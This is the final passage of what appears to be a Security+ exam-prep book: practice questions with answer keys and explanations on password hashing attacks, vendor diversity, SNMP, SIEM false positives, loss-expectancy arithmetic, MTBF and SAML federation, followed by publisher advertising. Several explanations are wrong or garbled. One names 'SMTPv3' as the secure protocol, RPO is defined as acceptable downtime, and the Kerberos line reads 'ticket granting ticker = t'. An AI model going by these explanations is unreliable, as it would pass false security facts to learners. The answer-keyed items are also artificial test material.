  1. You are a security administrator for a large multinational corporation based in the United Kingdom. You have just attended an annual seminar about the various types of password attacks. You have already disabled NTLM on all of the servers to prevent pass-the-hash attacks. Which of the following statements involves storing passwords as a hash value?

A. A collision attack, the hash value and the data match

B. A collision attack, the hash values match

C. A rainbow-table attack performs a search of simple passwords

D. A rainbow-table attack performs a search of precomputed hashes

Answer: B and D

Concept: A rainbow table is a list of precomputed hashes. A collision attack is where two hashes match.

Wrong answers:

A. When a hash is created, it takes the data inside a file and turns it into a hexadecimal hash value—they don't match

C. This is false; look at the explanation of the concept

  1. You are the new IT Director of a small, family-owned business that is rapidly expanding. You have submitted your annual budget for the IT team and the owners of the company want to know what you have asked for funds for "Vendor diversity". They have asked you to provide two good reasons why they should grant you the funds. Which of the following are the MOST suitable reasons why you wish to implement vendor diversity?

A. Reliability

B. Regulatory compliance

C. It is a best practice in the industry

D. Resiliency

Answer: A and D

Concept: Vendor diversity involves getting a service from two different providers at the same time. Vendor diversity provides reliability and resiliency. For example, if broadband from one provider fails, then the second provider's broadband should still be up and running.

Wrong answers:

B. There are no regulations that say you must get services from two suppliers

C. It is not an industry best practice, though it may well be advisable

  1. You are the network administrator for a large multinational corporation where you have captured packets that show that the traffic between the company's network devices is in clear text. Which of the following protocols could be used to secure the traffic between the company's network devices? Select all that apply.

A. SNMP V 3

B. SNMP

C. SCP

D. SFTP

Answer: A

Concept: Traffic between network devices uses a simple network transport protocol; the secure version is SMTPv3.

Wrong answers:

B. SNMP is not secure

C. SCP copies files securely

D. SFTP secures downloaded traffic from FTP sites

  1. You are the auditor of a large multinational corporation and the SIEM server has been finding vulnerabilities on a server. Manual inspection proves that it has been fully hardened and has no vulnerabilities. What are the two main reasons why the SIEM server is producing this output?

A. There was a zero-day virus

B. False negatives

C. False positives

D. The wrong filter was used to audit

Answer: C and D

Concept: If we are using the wrong configuration for the SIEM server, we will get poor monitoring, resulting in false positives.

Wrong answers:

A. A zero-day virus would not have been detected in the first place

B. False negatives allow attacks to happen, but are not detected

  1. You are a forensic investigator who has been called out to deal with a virus attack. You collect the information from the network card and volatile memory. After gathering, documenting, and securing the evidence of a virus attack, what is the best method for preventing further losses to the company?

A. Send a copy of the virus to the lab for analysis

B. Mitigate the attack and get the system back up and running

C. Initiate a chain of custody

D. Initiate business-impact analysis

Answer: B

Concept: Collecting the volatile evidence, mitigating the attack, removing the virus, and getting the system back up and running is the best thing to do. 

Wrong answers:

A. This does not get you back up and running

C. A chain of custody records who has handled the evidence and does not get you back up and running

D. BIA only tells you the losses that you have incurred and does not generate any income

  1. You are the purchasing manager for a very large multinational company, and you are looking at the company's policy that deals with the insurance of laptops. Last year, the company lost a record number of laptops. Your company is losing 10 laptops per month and the monthly insurance cost is $10,000. Which of the following laptop purchases would prevent you from purchasing insurance?

A. Budget laptops at $1,300 each

B. Budget laptops at $1,200 each

C. Budget laptops at $1,000 each

D. Budget laptops at $1,001 each

Answer: C

Concept:

SLE = ALE/ARO

ALE = 12 x 10,000 = $120,000 

ARO = 12 X 10 = 120 laptops a year

Single loss expectancy = $120,000/120 = $1000

Explanation: The cost of losing the laptops is $120,000, the same as purchasing the insurance. You should not take out the insurance in the hope that next year you may lose fewer laptops, as a record number of laptops has already been lost. 

Wrong answers:

A, B, and D would cost more than the insurance; therefore, in these cases, you would do better to take out the insurance.

  1. Your company has suffered a system-sprawl attack, and you need to be able to identify what has caused the attack and what the symptoms of the attack are. Which of the following attacks could cause system sprawl and what would be a tell-tale sign of it? Select the BEST two answers; each is a part of the solution:

A. SQL-injection

B. DoS attack

C. CPU at 100% utilization

D. Buffer-overflow

Answer: B and C

Concept: System sprawl is when your resources are running out—for example, if your CPU was at 100% utilization. When your system is running like this, it could also suffer from DoS, which makes resources unavailable with too many SYN flood attacks.

Wrong answers:

A. An SQL- injection attack involves placing the phrase 1 = 1 into a transact SQL script

D. A buffer-overflow attack involves putting more data into a field than it was programmed to handle

  1. Which of the following is a measure of reliability?

A. MTTR

B. MTBF

C. MTTF

D. RPO

Answer: B

Concept: Mean Time Between Failures (MTBF) is the measure of the number of failures. If I purchased a car and it broke down every day for the next week, I would take it back, as it would be unreliable.

Wrong answers:

A. MTTR is the mean time to repair. If I break down at 1 pm and it is repaired by 2 pm, the MTTR is 1 hour

C. MTTF is the mean time to failure; this is the lifespan of a piece of equipment

D. RPO is the recovery point objective. It is the amount of time a company can be without its data, meaning the acceptable downtime

  1. Which of the following are the characteristics of a third-party-to-third-party authentication protocol that uses XML-based authentication? Select the three BEST answers:

A. Single Sign-On (SSO)

B. Kerberos

C. SAML

D. Federation services

Answers: A, C, and D

Concept: Federation services is a third-party-to-third-party authentication method that uses SAML, an XML-based method for authentication. It also provides SSO. This means that you only log in once in order to get access to resources.

Wrong answer:

B. Kerberos uses a ticket granting ticker = t and only works on a Microsoft Active Directory domain.

Other Books You May Enjoy

If you enjoyed this book, you may be interested in these other books by Packt:

Python Penetration Testing Cookbook
Rejah Rehim

ISBN: 9781784399771

Cybersecurity – Attack and Defense Strategies
Yuri Diogenes, Erdal Ozkaya

ISBN: 9781788475297

Leave a review - let other readers know what you think

Please share your thoughts on this book with others by leaving a review on the site that you bought it from. If you purchased the book from Amazon, please leave us an honest review on this book's Amazon page. This is vital so that other potential readers can see and use your unbiased opinion to make purchasing decisions, we can understand what our customers think about our products, and our authors can see your feedback on the title that they have worked with Packt to create. It will only take a few minutes of your time, but is valuable to other potential customers, our authors, and Packt. Thank you!